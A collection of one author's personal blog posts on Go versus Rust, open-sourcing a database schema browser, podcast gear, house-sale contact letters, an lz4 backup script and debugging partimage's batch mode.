[Loris Cro's piece on choosing GoLang over Rust for the enterprise](https://kristoff.it/blog/why-go-and-not-rust/) is very compelling and I think probably has the argument that I've been looking for to persuade me that I should choose GoLang rather than Rust for timslist. I'm looking for something that will do engineering at scale in the long run while keeping hosting and programmer costs down.
Completely opposing this, and also very compelling is the story of [Why Discord is switching from Go to Rust](https://discord.com/blog/why-discord-is-switching-from-go-to-rust), where they show their massively improved metrics thanks to a rewrite of a GoLang microservice into Rust, along with assertions from experience of being able to keep engineering (relatively) small, and iterate fast. They say they are using Rust extensively in production which is reason for confidence in it as a choice as Discord probably has far more demanding needs than timslist would have any time in the next 20 years if it took off like a rocket.
[Early Impressions of Go From a Rust Programmer](https://betterprogramming.pub/early-impressions-of-go-from-a-rust-programmer-f4fd1074c410?gi=4ae004f7c897) is interesting because on the one hand it pretty much all points towards GoLang being the right answer (I happen to like the use of upper/lower case for public/private), however towards the end it shows some things that are missing that might make it harder to ever use higher level abstactions, and it notes the fact that nil-pointer de-refs are still a runtime failure in GoLang.
## Articles on Rust versus GoLang
* This is a must read on GoLang and Rust: <https://bitfieldconsulting.com/golang/rust-vs-go>
* <https://endler.dev/2017/go-vs-rust/> this one makes me think that perhaps using the hard road of Rust would give me some opportunities for hard-to-copy features in future (such as responsiveness, stability)
* <https://news.ycombinator.com/item?id=15266066> interesting discussion of the endler post
* <https://kristoff.it/blog/why-go-and-not-rust/> - a very persuasive and level-headed article article that explains the tradeoff in terms of real enterprise development (something I'm painfully familiar with).
* <https://codeburst.io/should-i-rust-or-should-i-go-59a298e00ea9?gi=8338640ecce8> - mentions that Rust can be made hard to read by other devs, an important point.
* [Why Discord is switching from Go to Rust](https://discord.com/blog/why-discord-is-switching-from-go-to-rust) - powerful article on how much better Rust is than GoLang for making the best use of server resources and providing low-latency high-throughput capabilities, with no GC related spikes in latency. A strong argument for Rust over GoLang.
* <https://blog.boot.dev/rust/concurrency-in-rust-can-it-stack-up-against-gos-goroutines/> compares concurrency and parallelism in Rust and GoLang in a short and enlightening style with some useful code samples. I think the differences are less important to the decision than the other factors above, clearly both can solve the problems as needed.
* <https://softwareengineering.stackexchange.com/questions/247298/how-are-rust-traits-different-from-go-interfaces> - dynamic and static dispatch
## Assimilating the tradeoffs
The pros and cons that are relevant to what I'm trying to do:
### In favour of GoLang
* Maintainable as more programmers added to team of varying quality and opinion (inevitable in the long run I think).
* Highly performant programs.
* Fast compile times on big codebases.
* I like the test library style (minimal, uncontrived, use real code to write tests).
* Has generics at last.
* Easy multi-threading (not sure I need this particularly).
* GC (easier than worrying about Rust's ideas).
* Continues to be used internally at google at scale so likely to be supported for a loooong time.
* Stated mission to remain a small language.
* Having watched C# go from being a truly knowable and useful language in 2.0 to being a sprawling mess with syntactic-sugar-itis in [C# 11](https://docs.microsoft.com/en-us/dotnet/csharp/whats-new/csharp-11), a state that makes it increasingly hard to work with the code of others and work well together in teams, I have no desire to set my own startup up for that fate.
* I'm guessing the ecosystem of libraries & frameworks for writing web things has matured since I last looked and is (I'm guessing) ahead of the Rust ecosystem.
* Explicit handling of errors by return (but also has panic available for burn-it-all-down errors, which can be caught).
### Against GoLang
* Error handling boilerplate.
* Module system is a bit confusing (perhaps they have it right and easy now?)
* Unknown future direction (do we know the future of any language really?)
* Code ends up quite verbose - volume of code can cause resistance to change.
* Dull, so might not be able to retain great coders in the long run as the zeitgeist moves on to hip'er pastures.
* No pattern matching coolness. I don't know if I'm just overexcited about discovering this way of coding or if it's actually important. No doubt I'll gain more perspective with practice.
* [Why Go Is Not Good by Will Yager](https://yager.io/programming/go.html)
### In favour of Rust
* Highly performant programs.
* Immutable by default (this is huge!)
* No null-ref errors (hooray!)
* Intersting new toy to learn.
* Potentially able to make higher level clean abstractions than in go.
* Created by Mozilla who we love.
* Owned and run by the independent [Rust Foundation](https://foundation.rust-lang.org/), so perhaps free from the dubious influence of commercial interests. (Though people don't ignore those that pay them).
* "Most loved language", but what does that mean? Possibly easier to attract talent that want to work in Rust? But will they be the right kind of talent? And how long will that last?
* No runtime means smaller WASM files I think, and there seems to be [lots of ways to optimise wasm file size in Rust](https://rustwasm.github.io/book/reference/code-size.html)
### Against Rust
* Harder to learn.
* Takes longer to write a single piece of functionality up front.
* Unknown future direction.
* The [Rust foundation is new](https://foundation.rust-lang.org/news/2021-02-08-hello-world/), and unproven in ability to maintain the language over the long term.
* I heard that there may be issues with the completeness and maintenance of libraries ("crates") in the Rust ecosystem, this is of particular concern when it comes to security issues. Perhaps this will improve, or perhaps I am misled. Every ecosystem has its security issues, it's a tough world out there at the moment no matter your platform.
* I clearly don't know what I'm doing yet, given how long it's taking me to build gitopolis.
* "Fighting the borrow checker" (perhaps a worthy price for eliminating whole classes of programming error at compile time).
* Perhaps a more limited pool of Rust programmers availale than GoLang programmers. If all I can find is a few relevant coders it's going to be harder to filter for other traits such as not-being-an-asshole, or communication skills.
* Layers and layers of boilerplate error/match handlers (or so I heard). Not sure if this is an issue yet, I need to get more experience to judge.
* Language for C++ coders, not people who want to build simple business value fast. Might encourage over-engineering for what should be straight-forward simple solutions to simple business needs.
* Complex language with many ways to solve problems, that might result in it being harder to maintain as programmers and styles come and go.
## What now?
I need to sleep on all this research, and spend some more time building gitopolis with all this in mind.
Currently there's a bit of me that thinks I "should" use GoLang as the "boring" option that would result in minimal drama, but my heart is definitely pullled towards Rust right now, and that's important because I have to actually want to work on this thing.
To be continued ...
<file_sep>---
title: "Pringles"
date: 2004-07-05
slashdot_url: https://slashdot.org/journal/76506/pringles
---
<p>Yay! My relations <a href="http://www.pringle.demon.co.uk/">on film</a> / now on the<br>net.</p>
<p>Super challenge too. Worthy of b3ta methinks.</p>
<file_sep>---
title: Why I made SQL Schema Explorer open source
layout: post
---
# What is SQL Schema Explorer?
It's a database schema & data browser that can follow foreign keys and draw
diagrams that I spent years building because I wanted it to exist and I thought
it might make a good first product.
# Why charge?
I'm pretty busy these days but I like working on software and building things
like this, to justify the amount of time that goes in I can no longer just have
it as a time-consuming hobby. I've also been learning about entrepreneurship as
a possible extension or next step from time-for-money contract-programming
services.
The idea was that if I could get enough yearly subscribers to the software then
I could get balsamiq-like success and focus on making it better and better for
the people using it.
# Why open source now?
I got plenty of interest and interactions by my standards, more than I've ever
had for something I've published; but I never got more than one good friend paid
up beyond a generous trial. The conversations I had with people were full of
enthusiasm for the idea but not for parting with money to buy it. One
particular conversation was very positive until the idea of putting the
theoretical purchase in front of the manager was raised and then suddenly it
didn't seem viable at all; which I think speaks volumes. Useful, but not useful
enough to risk any political capital to get it, even for a pretty insignificant
amount of money. I then had a coaching call with [<NAME>](https://justinjackson.ca/) and as part of that he suggested putting it
to one side. Up to this point I'd been unable to leave the idea alone; it had
been something I really wanted to exist. I've always worked with relational
databases, and this seemed like a painful gap. At this point I had finally
added every feature that I'd ever dreamed it should have, and the intrinsic
motivation to just build for the sake of building was waning, and without the
demands from paying users for more features it's hard to justify continuing to
pour hours in even if it is on the train.
At this point there were 100 people on the mailing list (drip sent my first
bill!), one paying user/fan (Hello David! Many thanks!), and zero MRR (monthly
recurring revenue). I'd spent a bit of money on hosting (I'm still paying
digital ocean to keep the [demo site](http://demo.schemaexplorer.io/) up).
I didn't want to let down the few people who had really liked it by having it
just vanish into the ether like so many failed startups. Fortunately this is
downloadable and installable software, not a SaaS that would have to be shut
down. I've always liked the open-source ethos, and given this was no longer a
direct financial opportunity it made sense to me to give it away freely under a
copyleft license.
It feels like having this as a portfolio piece given I sell coding for a living
won't do me any harm, and it makes it easier to take with me to client
projects, where I can use it to help them improve their database.
# Schema Explorer for client work
Here's some things I've been using schema explorer for to help my contracting clients
* Finding missing foreign keys without looking up complex `pg_schema` queries
* Analysing data in tables and sharing screenshots with the teams
* Sharing screenshots of the generated diagrams to improve team understanding
* Using it as a tool for discussing database design
* Finding records needed for troubleshooting and debugging
* Improving my mental model of the database structure
# Tell me more
It's now [A-GPL](https://en.wikipedia.org/wiki/Affero_General_Public_License)
which requires sharing any modified source code even if you are just letting
users access the generated site. If I'm giving my years of hard work for free,
I think it's only fair to require people to contribute their improvements back
to the community.
You can find the source code at <https://github.com/timabell/schema-explorer>
# Feedback
Please do get in touch if this sparked a thought or interest. Just a simple
email will do <<EMAIL>>
Thanks for listening.
<file_sep>---
title: Podcasting hardware setup
layout: post
---
## Current recording/playback setup
* [Samson Q2U cardiod XLR/USB Microphone](https://www.amazon.co.uk/gp/product/B001R747SG/) ~ £90
* USB means no need for a mixer or XLR adapter thing.
* Seems to be the best price/quality balance for me.
* The cardiod effect is pretty good, greatly reducing input of noises from elsewhere, especially if you talk really close to it (which I don't).
* [Proel RSM180 Microphone stand with boom](https://www.amazon.co.uk/gp/product/B002AI880O/) ~ £34
* Because standing desk, plus the Samson mic doesn't isolate vibrations from the desk if it's on a desk mount.
* [AKORD Microphone Swivel Pop Filter](https://www.amazon.co.uk/gp/product/B008AOH1O6/) ~ £5
* Because all the cool kids have one, and it was cheap. No idea if I really need it.
* Some old philips bluetooth headphones connected with a real headphone cable to the line out on the back of the Samson mic. I only use this for recording to avoid feedback from speakers. It has a feedback of your own voice which is disconcerting and nice in equal measure. For conference calls zoom and teams seem to do a decent job of cutting out the feedback, and I use mute a lot anyway so I don't bother with the headphones.
* The tiny and highly capable [Nobsound G3 2 Channel Bluetooth 5.0 Power Amplifier 100W](https://www.amazon.co.uk/gp/product/B07QQ47RTZ/) hifi amp, driving a pair of bookshelf Kefs for editing, music and conference calls.
* [Wharfedale Diamond SW150 Subwoofer](https://www.amazon.co.uk/gp/product/B0036EEOSQ) hiding at the back, because [frequencies below 100Hz](https://open.spotify.com/playlist/3GTZ7nPFzsoC8F0iaMWDpG?si=074a2d5d6ca84bc9) are important too.
## Video
Lately I've started [streaming the recording](https://www.youtube.com/watch?v=5KBFcuRWQ5s&t=1107s) of the show so it's worth mentioning the video (also for videoconferencing and work)
* [Logitech C920 HD Pro Webcam](https://www.amazon.co.uk/gp/product/B006A2Q81M/) ~ £60
* [Neewer USB lights x2](https://www.amazon.co.uk/gp/product/B07YFY7H7J) ~ £51
* [OBS (Open Broadcaster Software)](https://obsproject.com/)for live streaming + recording video+audio
* [restream.io](https://restream.io/) for streaming to multiple platforms
## Everything else
* Dell XPS15 (sometimes an XPS13)
* [Linux mint cinnamon](https://linuxmint.com/edition.php?id=288)
* [Standing desk](https://www.amazon.co.uk/gp/product/B00FOQD9EO) (no chair these days, previously kneely chairs and exercise balls).
* [Nextstand k2 Folding laptop stand](https://www.amazon.co.uk/gp/product/B01HHYQBB8)
* [Microsoft sidewinder X4 keyboard](https://www.amazon.co.uk/Microsoft-JQD-00006-Sidewinder-X4-Keyboard/dp/B0037KLSS8)
* [Logitech M570 trackball](https://www.amazon.co.uk/gp/product/B0042BBR2S) - I find the continuous thumb+finger grip needed for a mouse uncomfortable.
* [HP M477fdw laserjet + sheet feed scanner](https://www.amazon.co.uk/gp/product/B0151VIQLW) because life's too short for manually scanning one page at a time. Configured to automatically send scans to server over smb, then sync'd to all devices with syncthing. Win.
* [Cocoon security camera](https://www.amazon.co.uk/Cocoon-Security-Multi-Room-Protection-Compatible/dp/B0120BP0V0) - one of the few with no monthly fee, not sure there's a future in this one
* Giant mug for enough tea for an hour or two
## Pics

## Also-ran hardware
I started with a [Jabra Evolve 65 wireless headset](https://www.amazon.co.uk/gp/product/B074BPJRBW/) (~£130 because covid prices) but that heavily processes voice so while it's great for conference calls it's not good for anything beyond your third episode as people will unsubscribe just for the sound quality. Still use them for on the go conference calls and phone calls, and occasionally music (though my phone's bluetooth is currently borked).
I tried a [Blue Microphones Snowball USB Microphone](https://www.amazon.co.uk/gp/product/B002OO18NS/) (~£75) next, but that picks up *everything* even in it's alleged cardioid mode.
## Out of my price range
Some of my friends who take it more seriously splashed out on a [Shure SM7B XLR Mic](https://www.shure.com/en-GB/products/microphones/sm7b) at a mere £389, and you have to by an XLR mixer to run it. I have to say they sound lurvely, and when they knock it you hardly hear it so it's got excellent vibration isolation built in.
<file_sep>---
title: House buying and selling tip - make contact!
layout: post
---
I've learned a useful trick as part of buying and selling house(s) that I want to share with you just in case you find it useful. It could save you months of stress and delay, and maybe even save a deal that was going to fail.
## The big secret
Establish direct contact with the buyer/seller.
This will allow you to co-ordinate on making the sale happen and spot anywhere that the chain of communication has broken down. (E.g. both solicitors waiting for each other and a message between them that has vanished into the ether).
## But how?
This should be easy, but estate agents don't want you to go round them, and solicitors won't necessarily pass on your request. But there is a way round this.
### Buying a house
Simple, put a note through the seller's letterbox offering direct contact and including your contact details.
Here's [a template note to a seller](https://docs.google.com/document/d/1PkJ-XiodC7bW0fXikQP0Ur3EyDLy0z1wGhRLtzfSh0I/edit?usp=sharing) that worked for me in a previous purchase.
#### Sample letter to sellers
> To:
> The Owners,
> [Address of house
> you want to buy]
>
> [Your name here]
> [Your address (optional)]
>
> Contact: [01184960000 / <EMAIL>]
>
> [Date]
>
> Hi,
>
> We’re the people who put the offer in on your house, and we just wanted to give you the opportunity to make direct contact should you have any questions.
>
> We still absolutely love your house, and are very keen to proceed with the purchase. We are working with [Estate Agent] to move the sale of our house forward.
>
> Our contact details are above, don’t hesitate to get in touch should you wish to. We will of course still do all formal communications through the estate agents and solicitors, we’ve just found it handy in the past to also have direct contact.
>
> Yours,
>
> [Your name here]
### Selling a house
Write a formal letter with an offer of direct communications and include your contact details, PDF it and send it to your solicitor to pass on. Because this is officially a letter to the seller both solicitors will I think be obliged to pass it on.
Here's [a template note to a buyer](https://docs.google.com/document/d/1E677UNhLQq0CQkd4FuSfADiVMpGbHFdgztJzMQq4q9A/edit?usp=sharing) that worked for me in a previous sale.
#### Sample letter to buyers
> FAO: [Buyer Name Here]
> C/O: [Buyer’s Solicitors]
> Ref: [Property Address]
> Thu 4 Mar 21
>
> Dear [Name],
>
> This is just a personal note in addition to the formalities around the sale to let you know that we are keen for the process to go smoothly for both sides and that if there’s anything you need from us you are welcome to make direct contact as needed.
>
> All contractual and legal issues will continue to be dealt with through our solicitors and the estate agent, however we have found it useful in the past to be able to co-ordinate directly to ensure a smooth route to a completed sale.
>
> There is no pressure to accept, but should you wish to do so please find my contact details below.
>
> Confirmation of your receipt of this letter would be greatly appreciated.
>
> Yours
>
> [Your Name]
>
> [<EMAIL>]
> [01184960000]
## I ain't no lawyer
Do this at your own risk! Just as this could help, you could also use this communication channel to sink a deal that would have worked out, or even get yourself in legal trouble.
<file_sep>---
title: "Weekend / Talent? / Sport / Theatre"
date: 2004-10-04
slashdot_url: https://slashdot.org/journal/85850/weekend--talent--sport--theatre
---
<p><i>Weekend</i><br>This weekend involved films, work, drinking and sleeping on sofas (not mine). It did not involve wimbledon.<br>The Importance of Being Earnest is now firmly embedded in my memory as one of the funnier things I have seen, starring Mr D'Arcy as someone else.</p>
<p><i>Talent?</i><br>Just finished an hour of guitar practice with my mentor mr kev, and have now completed excercise 50 in the book (of 150). Not quite the musical heights and fame I was hoping for by now, and still no news of that record deal, hur hur. Only positive outcome has been acquisition of the nickname the axe man courtsey of a close personal friend, who says he's inclined to break out the fire axe whenever I play. Thanks for the moral support<nobr> </nobr>;)</p>
<p><i>Sport</i><br>Started playing badminton again, or at least I've been once! I'd forgotten how much fun it can be.</p>
<p><i>Theatre</i><br>Oh, and I've booked some tickets for the play, but it doesn't look like there will be any problems obtaining a few more. So thank you those of you who declined due to being out of the country or who have work etc, and if anyone else isn't sure then you can let me know nearer the time. (Though for now there's a whole row with my name on it). For those who are coming, I need to make plans for eating out, and there will be at least some space to crash at mine if reuired.</p>
<p>Luv to all</p>
<p>Tim</p>
<file_sep>---
title: "moved"
date: 2004-12-23
slashdot_url: https://slashdot.org/journal/93713/moved
---
<p>Glad that's over.<br>I've moved now. And am still super busy. Life is good though.<br>Left office at 10.30 last night having repatched the network. Then I cleaned the fridge and fixed a few cupboards!<br>Today I have been mostly driving a W-Reg Fiat Uno, which is amusing. (My car failed MOT on its horn.)</p>
<p>Merry xmas one and all, and as Kev said, hope to see you at new year. I think we're having curry in the office today to celebrate, which I'm looking forward to.</p>
<file_sep>---
title: "workworkworkworkworkworkwork..."
date: 2004-11-04
slashdot_url: https://slashdot.org/journal/89346/workworkworkworkworkworkwork
---
<p>lately I have been mostly writing this website:<br><a href="http://www.emapsite.com/streetsahead/">http://www.emapsite.com/streetsahead/</a><br>I worked all weekend and am stretched to the limit, cos tomorrow will be the 13th day of work on the trot without a break.</p>
<p>I've managed to get fedora running nicely on my main box now, up2date and add/remove took a while to get working, and they seem to have removed mozilla's built in mail client in favour of evolution (and thunderbird).<br>I look forward to becoming a hardened linux hacker. Don't suppose any of you know if subversion is as good as the promotional material says it is do you?</p>
<p>Once again, I still need to find people who are looking for a place in Reading, if you know anyone then put them in touch with me.</p>
<p>I'm quite pleased with the progress of the online <a href="http://slashdot.org/~tim_abell/friends">friends list</a>. I'd really like everyone to be part of this network. Everyone say a big hello to our new addition Chris (old friend from back in the dayz!)</p>
<p>Did I mention how much I dislike clothes washing? I've got to hang it all up now. _sigh_</p>
<p>L8r</p>
<file_sep>---
layout: post
title: Startup competitors - Data Viewer
date: 2017-01-17 01:55:27.000000000 +00:00
categories: []
categories: [sdv, startup]
permalink: "/2017/01/17/startup-competitors-data-viewer/"
---
If you follow my ramblings you might know that I've revived my interest in
creating a commercial tool to help devs, dbas etc browse their sql databases.
I've done some research before and didn't find much on a par with what I have
in mind. I've done a bit more, and turned up a couple:
* [A feature of sql
workbench](http://www.sql-workbench.net/fk_lookup_png.html) - I've seen the
product but didn't know it could do that. Not directly competition as it's
not nearly as smooth to use as what I'm building for this particular use
case.
* [SqlSmash](http://www.sqlsmash.com/) - Something I'd not seen before, which
has [fk based navigation (vid)](https://youtu.be/Z0kdqcrYHdo?t=1m14s)
that's basically what I'm building, albeit embedded in SSMS rather than
standalone.
This isn't the first time I've had the experience of getting started before
discovering another product that basically solves the problem I'm gunning for.
([Ready-roll](http://www.red-gate.com/products/sql-development/readyroll/) was
the last, since bought by red-gate).
Now it's not that I thought my idea was magic or special or a unique little
flower, but why is it after working with SQL Server databases for 15 years that
I've only just noticed this tool (which I would have found useful and probably
would have paid for).
If I created another would it be just as obscure? Should I still go ahead even
though it's a solved problem? Are there any ideas left on the earth?
Something for me to consider this week. I might update this post with further
thoughts. Your thoughts are welcome.
---
* You might also like this post: [Database tools I was surprised
existed](/2019/06/10/database-tools-you-didnt-know-about/)
* I did end up building it, and it became <https://schemaexplorer.io/>
<file_sep>---
title: "paris who?"
date: 2004-07-30
slashdot_url: https://slashdot.org/journal/78957/paris-who
---
<p><a href="http://www.banterist.com/archivefiles/000125.html">oh!</a> I've been wondering what the fuss was about.</p>
<file_sep>---
title: Fast backup to external drive with lz4
layout: post
---
The simplest backup is to just tar-gz your home directory, but it's painfully
slow. [A friend](http://blog.luxagen.com/2016/build-backups-an-unexpected-journey/) put me on to [lz4](https://lz4.github.io/lz4/) which isn't installed by default in ubuntu &
mint, it moves the bottleneck from the compressor to disk i/o for my spinning
rust usb disks.
The default output of this is basically silence for two hours while it runs
which isn't great. Enter `pv` ([pipe
viewer](https://www.howtogeek.com/428654/how-to-monitor-the-progress-of-linux-commands-with-pv-and-progress/))
which can show you progress based on byte count.
Install lz4 and pv with:
sudo apt install liblz4-tool pv
And then pipe the output of tar through pv and into lz4
Here's a quick script for backing up my home folder to an external drive;
customize to suit your needs:
```bash
#!/bin/sh
# https://gist.github.com/timabell/68d112d66623d9a4a3643c86a93debee#file-backup-sh
echo "Opening/creating backup folder..."
mountpoint=/media/tim/backup/
cd "$mountpoint"
mkdir -p fox
cd fox
base=/home/
src=tim
echo "Getting source folder size..."
size_bytes=`du -sb "$base/$src" | awk '{print $1}'`
echo "$size_bytes bytes to backup."
echo "Backing up..."
tar -cpC $base $src -P | pv -s "$size_bytes" | lz4 >> "$(date -d "today" +"%Y%m%d-%H%M")-home.tar.lz4"
echo "Done."
```
*This script is also available here:
<https://gist.github.com/timabell/68d112d66623d9a4a3643c86a93debee#file-backup-sh>*
## Things to watch out for
* Progress is inaccurate and variable because it's based on input bytes
processed vs total, but the speed is limited by output bytes to the spinning
rust backup disk, and the ratio varies with the compressability of the input
data.
* Finding a file will require reading or decompressing the entire archive
because of the way tar works.
## Keeping it simple
There's lots of great backup tools for backing up home but most of them create
obscure custom formatted backups, often with incremental backups and chunked up
files for efficient use of space. While that's great I know from experience
that you don't always have all the right tools available to unpack such things
when you really need them, and there's always the chance that you are missing
an important incremental. In short complexity is worrying when it comes to
backup (and especially restore).
## References:
* <https://stackoverflow.com/questions/24063846/how-to-use-tar-with-lz4#24086155>
* <https://superuser.com/questions/168749/is-there-a-way-to-see-any-tar-progress-per-file/665181#665181>
* <https://stackoverflow.com/questions/8228047/adding-timestamp-to-a-filename-with-mv-in-bash/8229220#8229220>
<file_sep>---
title: "Biking"
date: 2004-08-14
slashdot_url: https://slashdot.org/journal/80339/biking
---
<p>Spent an enjoyable afternoon out on the trails north of henley today. Found lots of mud, nettles rocks and things interspersed with the occasional nice view and a fair amount of sunshine. A fairly injury free day given the size of our group. Tried out the new local "fat fish" shop for dinner. Tasty, would recommend, pleasant staff as well which makes such a difference when you're buying cod 'n chips!</p>
<file_sep>---
title: "What's your political persuasion?"
date: 2005-05-25
slashdot_url: https://slashdot.org/journal/107738/whats-your-political-persuasion
---
<p><a href="http://www.theadvocates.org/quiz.html">http://www.theadvocates.org/quiz.html</a></p>
<p>I'm a liberal lefty. (Surprise)</p>
<p>Post your answers as replies to this post<nobr> </nobr>:-)</p>
<file_sep>---
layout: post
title: running partimage in batch mode
date: '2007-04-10T22:01:00.000Z'
author: <NAME>
tags:
- partimage
- dev
- project
modified_time: '2007-04-11T01:08:46.017Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3391820548015517010
blogger_orig_url: https://timwise.blogspot.com/2007/04/running-partimage-in-batch-mode.html
---
<span style="font-style: italic;">A continuation of the [partimage](http://www.partimage.org/) project.</span>
As it would appear that stdout support doesn't work due the user interface
making use of stdout, I have been figuring out how to make the program run in
batch mode, with a little help from KDevelop.
My continued findings:
The help presents a fully batch mode, -B
$ ./partimage --help
===============================================================================
Partition Image (http://www.partimage.org/) version 0.6.5_beta4 [stable]
---- distributed under the GPL 2 license (GNU General Public License) ----
Supported file systems:....Ext2/3, Reiser3, FAT16/32, HPFS, JFS, XFS,
UFS(beta), HFS(beta), NTFS(experimental)
usage: partimage [options] <action> <device> <image_file>
partimage <imginfo/restmbr> <image_file>
ex: partimage -z1 -o -d save /dev/hda12 /mnt/backup/redhat-6.2.partimg.gz
ex: partimage restore /dev/hda13 /mnt/backup/suse-6.4.partimg
ex: partimage restmbr /mnt/backup/debian-potato-2.2.partimg.bz2
ex: partimage -z1 -om save /dev/hda9 /mnt/backup/win95-osr2.partimg.gz
ex: partimage imginfo /mnt/backup/debian-potato-2.2.partimg.bz2
ex: partimage -a/dev/hda6#/mnt/partimg#vfat -V 700 save /dev/hda12 /mnt/partimg/redhat-6.2.partimg.gz
Arguments:
* <action>:
- save: save the partition datas in an image file
- restore: restore the partition from an image file
- restmbr: restore a MBR of the image file to an hard disk
- imginfo: show informations about the image file
* <device>: partition to save/restore (example: /dev/hda1)
* <image_file>: file where data will be read/written. Can be very big.
For restore, <image_file> can have the value 'stdin'. This allows
for providing image files through a pipe.
Options:
* -z, --compress (image file compression level):
-z0, --compress=0 don't compress: very fast but very big image file
-z1, --compress=1 compress using gzip: fast and small image file (default)
-z2, --compress=2 (compress using bzip2: very slow and very small image file):
* -c, --nocheck don't check the partition before saving
* -o, --overwrite overwrite the existing image file without confirmation
* -d, --nodesc don't ask any description for the image file
* -V, --volume (split image into multiple volumes files)
-VX, --volume=X create volumes with a size of X MB
* -w, --waitvol wait for a confirmation after each volume change
* -e, --erase erase empty blocks on restore with zero bytes
* -m, --allowmnt don't fail if the partition is mounted. Dangerous !
* -M, --nombr don't create a backup of the MBR (Mast Boot Record) in the image file
* -h, --help show help
* -v, --version show version
* -i, --compilinfo show compilation options used
* -f, --finish (action to do if finished successfully):
-f0, --finish=0 wait: don't make anything
-f1, --finish=1 halt (power off) the computer
-f2, --finish=2 reboot (restart the computer):
-f3, --finish=3 quit
* -b, --batch batch mode: the GUI won't wait for an user action
* -BX, --fully-batch=X batch mode without GUI, X is a challenge response string
* -y, --nosync don't synchronize the disks at the end of the operation (dangerous)
* -sX, --server=X give partimaged server's ip address
* -pX, --port=X give partimaged server's listening port
* -g, --debug=X set the debug level to X (default: 1):
* -n, --nossl disable SSL in network mode
* -S, --simulate simulation of restoration mode
* -aX, --automnt=X automatic mount with X options. Read the doc for more details
* -UX --username=X username to authenticate to server
* -PX --password=X password for authentication of user to server
===============================================================================
It is not immediately obvious what "X is a challenge response string" means.
I was able to get the program to run to a limited extend after a bit of searching the internet and trial and error with the option "-B x=y".
Having stepped through the program, it transpires that where I have put "x", the program expects a pattern to match with the title and content of any messages that would otherwise have been shown to the user, and "y" is the pre-programmed response. This is in the "interface_none" section.
"x" has to match the question in the form "message title/message content" and is compared using fnmatch which allows * as a wildcard (anyone got a good reference for fnmatch?).
If the program hits a question for the user, and cannot find a matching answer in the command arguments, "CInterfaceNone::invalid_programmed_response()" fires "exit(8)" and the program dies.
So far I have been running the program as a normal user, which will inevitably fail where it attempts to work with block devices / root owned files & folders. This produces a warning in the user interface, followed by program termination.
To bypass this first "not root" warning, I successfully used this pre-programmed answer:
./partimage -B Warning*=Continue
Alternatively the following is more specific and also works:
./partimage -B Warning*root*=continue
I haven't figured out how to pass more than one predefined answer in batch mode.
The run arguments can be set in KDevelop here:
project > options > debugger > program arguments
_Side note:_
The program has a base class of user interface defined, and then either instantiates interface_none or interface_newt depending on command line arguments.
If not using full batch mode it helps to set "enable separate terminal for application IO" in KDevelop (project > options > debugger) so that you can see the full user interface. However if the program exits then the console closes and any output is lost.
As part of stepping through the code, I came across a macro, which makes the program harder to follow while debugging due to not being able to step through. So I figured out what it did, and wrote out its output C++ code in full:
[interface_none.cpp, line 103](http://partimage.svn.sourceforge.net/viewvc/partimage/trunk/partimage/src/client/interface_none.cpp?revision=1&view=markup&pathrev=20#l_103)
#define MB_2(One,Other,ONE,OTHER) \
int CInterfaceNone::msgBox##One##Other(char *title, char *text, ...) { \
char *result= lookup(title,text,"(unspecified)"); \
va_list al; \
va_start(al,text); \
message_only(#One "/" #Other, title, text, al, result); \
va_end(al); \
if (!strcasecmp(result,#One)) return MSGBOX_##ONE; \
if (!strcasecmp(result,#Other)) return MSGBOX_##OTHER; \
invalid_programmed_response(); \
return 0; \
}
MB_2(Continue,Cancel,CONTINUE,CANCEL)
MB_2(Yes,No,YES,NO)
my expanded version:
//notes: have expanded out macro so I can step through it.
int CInterfaceNone::msgBoxContinueCancel(char *title, char *text, ...) {
char *result= lookup(title,text,"(unspecified)");
va_list al;
va_start(al,text);
message_only("Continue" "/" "Cancel", title, text, al, result);
va_end(al);
if (!strcasecmp(result,"Continue")) return MSGBOX_CONTINUE;
if (!strcasecmp(result,"Cancel")) return MSGBOX_CANCEL;
invalid_programmed_response();
return 0;
}
int CInterfaceNone::msgBoxYesNo(char *title, char *text, ...) {
char *result= lookup(title,text,"(unspecified)");
va_list al;
va_start(al,text);
message_only("Yes" "/" "No", title, text, al, result);
va_end(al);
if (!strcasecmp(result,"Yes")) return MSGBOX_YES;
if (!strcasecmp(result,"No")) return MSGBOX_NO;
invalid_programmed_response();
return 0;
}
**creating a ramdisk for testing.**
[http://www.vanemery.com/Linux/Ramdisk/ramdisk.html](http://www.vanemery.com/Linux/Ramdisk/ramdisk.html)
(I am on ubuntu 6.10 here, details may vary)
$ ls -l /dev/ram*
brw-rw---- 1 root disk 1, 0 2007-04-08 20:10 /dev/ram0
brw-rw---- 1 root disk 1, 1 2007-04-08 20:10 /dev/ram1
brw-rw---- 1 root disk 1, 10 2007-04-08 20:10 /dev/ram10
brw-rw---- 1 root disk 1, 11 2007-04-08 20:10 /dev/ram11
brw-rw---- 1 root disk 1, 12 2007-04-08 20:10 /dev/ram12
brw-rw---- 1 root disk 1, 13 2007-04-08 20:10 /dev/ram13
brw-rw---- 1 root disk 1, 14 2007-04-08 20:10 /dev/ram14
brw-rw---- 1 root disk 1, 15 2007-04-08 20:10 /dev/ram15
brw-rw---- 1 root disk 1, 2 2007-04-08 20:10 /dev/ram2
brw-rw---- 1 root disk 1, 3 2007-04-08 20:10 /dev/ram3
brw-rw---- 1 root disk 1, 4 2007-04-08 20:10 /dev/ram4
brw-rw---- 1 root disk 1, 5 2007-04-08 20:10 /dev/ram5
brw-rw---- 1 root disk 1, 6 2007-04-08 20:10 /dev/ram6
brw-rw---- 1 root disk 1, 7 2007-04-08 20:10 /dev/ram7
brw-rw---- 1 root disk 1, 8 2007-04-08 20:10 /dev/ram8
brw-rw---- 1 root disk 1, 9 2007-04-08 20:10 /dev/ram9
create and mount test ramdisk
# mke2fs /dev/ram0
# mkdir /media/ram0
# mount /dev/ram0 /media/ram0
add a test file and unmount the disk
# echo "test data #1." >> /media/ram0/foo.txt
# umount /media/ram0
the above, as a script:
#!/bin/bash
# create and mount test ramdisk
mke2fs /dev/ram0
if [ ! -d /media/ram0 ]; then
mkdir /media/ram0
fi
mount /dev/ram0 /media/ram0
#add a test file and unmount the disk
echo "test file." >> /media/ram0/foo.txt
date >> /media/ram0/foo.txt
cat /media/ram0/foo.txt
umount /media/ram0
Create & run script (as root, because it (un)mounts a file system, and creates a dir in a root owned folder):
$ gedit mkram.sh
$ chmod ug+x mkram.sh
$ sudo ./mkram.sh
Wierdly, partimage won't run in full batch mode without a second part to the -B switch, even if it's set up to not need to ask any questions. Supplying a dummy "x=y" seems sufficient to fool it.
Runing as root without asking for partition description works:
